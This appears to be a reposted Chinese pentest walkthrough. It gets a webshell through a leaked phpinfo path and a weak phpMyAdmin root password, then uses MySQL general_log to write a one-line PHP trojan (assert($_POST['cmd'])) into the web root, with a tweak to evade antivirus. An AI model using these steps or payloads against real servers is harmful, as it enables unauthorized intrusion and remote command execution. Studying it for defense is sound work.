phpmyadmin+phpinfo()+webshell如何簡(jiǎn)單繞過(guò)getshell，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來(lái)學(xué)習(xí)下，希望你能有所收獲。

創(chuàng)新互聯(lián)自2013年創(chuàng)立以來(lái)，先為樂(lè)亭等服務(wù)建站，樂(lè)亭等地企業(yè)，進(jìn)行企業(yè)商務(wù)咨詢服務(wù)。為樂(lè)亭企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問(wèn)題。

信息收集

通過(guò)信息收集發(fā)現(xiàn)phpinfo頁(yè)面：

找到關(guān)鍵信息web路徑C:/ps/WWW

首先想到的是臨時(shí)目錄批量上傳文件然后再利用文件包含漏洞拿shell

先測(cè)試有沒(méi)有臨時(shí)目錄：

編寫(xiě)腳本，上傳文件探測(cè)是否存在phpinfo包含臨時(shí)文件的信息。

import requests

 

files = {

  'file': ("aa.txt","ssss")

}

url = "http://x.x.x.x/phpinfo.php"

r = requests.post(url=url, files=files, allow_redirects=False)

print(r.text)

發(fā)現(xiàn)存在臨時(shí)文件

繼續(xù)利用條件競(jìng)爭(zhēng)上傳失敗。

然后測(cè)試有沒(méi)有文件包含，并沒(méi)有。

然后繼續(xù)信息收集發(fā)現(xiàn)phpmyadmin  并且發(fā)現(xiàn)root用戶弱口令漏洞

經(jīng)測(cè)試發(fā)現(xiàn)MySQL中的Into outfile被禁用:

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

下一步查詢general_log處于開(kāi)啟狀態(tài)，狀態(tài)為開(kāi)啟的時(shí)候，系統(tǒng)將mysql以后執(zhí)行的每一條查詢語(yǔ)句寫(xiě)入你指定的位置的文件里。而文件的位置則由general_log_file確定。我們可以開(kāi)啟這個(gè)選項(xiàng)后，可以先指定路徑為一個(gè)php文件，再執(zhí)行sql語(yǔ)句SELECT '<?php assert($_POST["cmd"]);?>';，這個(gè)指令就把木馬插入到你指定的php文件中去了。

于是我們可以設(shè)置general_log_file為一個(gè)php文件，最后用一句話木馬進(jìn)行查詢來(lái)獲取shell

漏洞利用

由于前面phpinfo頁(yè)面里已經(jīng)找到web路徑，可構(gòu)造以下語(yǔ)句：

SET global general_log_file='C:/ps/www/xiaoma.php';

寫(xiě)入webshell的時(shí)候發(fā)現(xiàn)直接構(gòu)造eval函數(shù)訪問(wèn)的時(shí)候提示報(bào)錯(cuò)大概的意思就是提示文件內(nèi)容變?yōu)?行，判斷是被殺了。

于是稍微改動(dòng)一下，如下圖，eval會(huì)將輸入的$a作為php語(yǔ)句執(zhí)行，因此只要對(duì)l賦一定的system命令值，就能夠執(zhí)行系統(tǒng)命令

訪問(wèn)一下這次沒(méi)有被殺

shell到手：

思路

phpinfo漏洞利用思路如下：

1、phpinfo中可以看到上傳的臨時(shí)文件的路徑，從而實(shí)現(xiàn)LFI+getshell

https://www.pianshen.com/article/71091159796/

phpmyadmin漏洞利用思路如下：

1、利用全局變量general_log去getshell

2、利用slow_query_log慢查詢?nèi)罩緂etshell

3、利用phpmyadmin4.8.x本地文件包含漏洞getshell

https://www.icode9.com/content-3-218228.html

4、select into outfile直接寫(xiě)入

https://www.lurbk.com/lur2774.html

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對(duì)創(chuàng)新互聯(lián)的支持。

分享文章：phpmyadmin+phpinfo()+webshell如何簡(jiǎn)單繞過(guò)getshell
標(biāo)題網(wǎng)址：http://www.rwnh.cn/article6/jgjiig.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供軟件開(kāi)發(fā)、網(wǎng)頁(yè)設(shè)計(jì)公司、動(dòng)態(tài)網(wǎng)站、外貿(mào)建站、小程序開(kāi)發(fā)、網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)